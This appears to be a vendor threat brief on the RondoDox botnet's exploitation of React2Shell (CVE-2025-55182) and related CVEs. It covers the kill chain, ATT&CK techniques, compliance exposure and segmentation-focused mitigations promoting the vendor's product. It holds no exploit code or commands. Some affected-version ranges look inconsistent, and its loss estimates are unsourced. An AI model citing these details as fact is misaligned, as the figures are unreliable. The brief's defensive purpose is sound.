RondoDox Botnet Weaponizes Critical React2Shell Flaw: Lessons from a Global IoT Hijack
Executive Summary
From March to December 2025, the RondoDox botnet orchestrated a widespread campaign by exploiting the critical React2Shell (CVE-2025-55182) vulnerability to compromise over 90,000 Internet of Things (IoT) devices and web servers globally, with a major concentration in the U.S. Attackers conducted phased operations, ranging from reconnaissance and mass scanning to the automated deployment of advanced Mirai-based payloads and cryptocurrency miners. Capable of remote code execution, RondoDox’s malware loader established persistence, eliminated rival threats, and enabled command-and-control operations for further lateral movement and resource hijacking.
This breach highlights an alarming trend of botnets swiftly weaponizing zero-day vulnerabilities in widely used frameworks like React and Next.js, amplifying both organizational and regulatory risk across hybrid and IoT environments. Growing sophistication in persistence mechanisms and targeted east-west attacks underscores the urgent need for robust segmentation, continuous monitoring, and zero trust advances.
Why This Matters Now
This incident demonstrates how botnets can rapidly exploit unpatched, critical vulnerabilities to compromise extensive networks of IoT and web infrastructure. The urgency is heightened by the continuing existence of tens of thousands of vulnerable devices, the expanding use of cryptomining, and the accelerating development of automated attack kits targeting popular cloud-native stacks.
Attack Path Analysis
Attackers initially leveraged the critical React2Shell vulnerability (CVE-2025-55182) for remote code execution on exposed IoT devices and web servers. Once compromised, malicious scripts established persistence and removed competing malware, escalating privileges as needed to maintain control and operate undetected. The malware enabled lateral movement within the internal IoT networks, seeking vulnerable adjacent workloads. Infected devices then connected to the RondoDox botnet C2 infrastructure, facilitating remote management, payload updates, and maintaining communication for further instructions. While the primary intent was resource hijacking for cryptomining, the bots could enable exfiltration of environment or runtime data over outbound channels. The final impact was the sustained hijacking of device compute resources and disruption of legitimate services through constant process suppression, cryptomining, and botnet participation.
Kill Chain Progression
Initial Compromise
Description
Attackers scanned and exploited unpatched React2Shell (CVE-2025-55182) on exposed IoT devices and web servers, achieving remote code execution to gain initial access.
Related CVEs
CVE-2025-55182
CVSS 10A pre-authentication remote code execution vulnerability in React Server Components allows unauthenticated attackers to execute arbitrary code via crafted HTTP requests.
Affected Products:
Meta Platforms, Inc. React Server Components – 19.0.0, 19.1.0, 19.1.1, 19.2.0
Vercel Inc. Next.js – < 12.1.1
Exploit Status:
exploited in the wildCVE-2023-1389
CVSS 8.8A command injection vulnerability in TP-Link Archer AX21 routers allows remote attackers to execute arbitrary commands via crafted requests.
Affected Products:
TP-Link Archer AX21 – < 1.1.4
Exploit Status:
exploited in the wildCVE-2025-24893
CVSS 9.8An unauthenticated remote code execution vulnerability in XWiki allows attackers to execute arbitrary code via crafted requests.
Affected Products:
XWiki XWiki – < 13.10.11
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Exploit Public-Facing Application
Command and Scripting Interpreter
Application Layer Protocol: Web Protocols
Create Account
Event Triggered Execution: Unix Shell Configuration Modification
Impair Defenses: Disable or Modify Tools
Resource Hijacking
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Patch Management for Security Vulnerabilities
Control ID: 6.2.4
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: Section 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Article 9
CISA ZTMM 2.0 – Continuous Vulnerability Management
Control ID: Asset/Application Security: Vulnerability and Patch Management
NIS2 Directive – Supply Chain Security and Vulnerability Handling
Control ID: Article 21(2)d
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Information Technology/IT
Critical exposure through React Server Components and Next.js applications, requiring immediate patching and zero trust segmentation to prevent botnet enrollment.
Computer Software/Engineering
Direct vulnerability in React/Next.js frameworks enables remote code execution, demanding urgent security updates and east-west traffic monitoring capabilities.
Financial Services
High-value targets for cryptocurrency mining botnets with strict compliance requirements under PCI DSS and NIST frameworks for application security.
Health Care / Life Sciences
IoT medical devices vulnerable to RondoDox botnet exploitation, requiring HIPAA-compliant network segmentation and encrypted traffic protection measures.
Sources
- RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servershttps://thehackernews.com/2026/01/rondodox-botnet-exploits-critical.htmlVerified
- RondoDox Botnet Exploiting React2Shell Vulnerabilityhttps://www.securityweek.com/rondodox-botnet-exploiting-react2shell-vulnerability/Verified
- Security Bulletin: IBM Rhapsody Systems Engineering is using next-15.4.7.tgz which is vulnerable to CVE-2025-55182https://www.ibm.com/support/pages/node/7255181Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Applying Zero Trust segmentation, egress policy enforcement, and traffic visibility controls as provided by CNSF would have significantly contained lateral spread, identified anomalous behavior, and blocked command-and-control traffic, thus disrupting the botnet kill chain early.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Inline distributed enforcement identifies and blocks known exploit patterns at ingress.
Control: Threat Detection & Anomaly Response
Mitigation: Anomaly detection and alerting surface suspicious persistence and runtime modification attempts.
Control: Zero Trust Segmentation
Mitigation: Microsegmentation policies block unauthorized workload-to-workload and east-west movement.
Control: Egress Security & Policy Enforcement
Mitigation: Outbound connections to known malicious C2 endpoints are blocked.
Control: Cloud Firewall (ACF)
Mitigation: Granular firewall policies prevent unauthorized outbound data flows.
Segmentation and monitoring reduce blast radius of compromise and highlight abnormal resource use.
Impact at a Glance
Affected Business Functions
- Web Hosting
- E-commerce Platforms
- IoT Device Management
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive customer data and intellectual property due to unauthorized access and control over compromised servers and IoT devices.
Recommended Actions
Key Takeaways & Next Steps
- • Patch all IoT devices and public-facing web applications regularly to close known vulnerabilities like CVE-2025-55182.
- • Enforce strict Zero Trust segmentation to isolate IoT and untrusted workloads from critical infrastructure and internal resources.
- • Deploy inline egress policy controls to identify and block unauthorized external C2 and exfiltration traffic in real time.
- • Implement behavioral anomaly detection and incident response workflows to surface persistence and runtime attacks quickly.
- • Leverage centralized cloud-native visibility and policy automation to ensure consistent enforcement and minimize lateral movement opportunities.
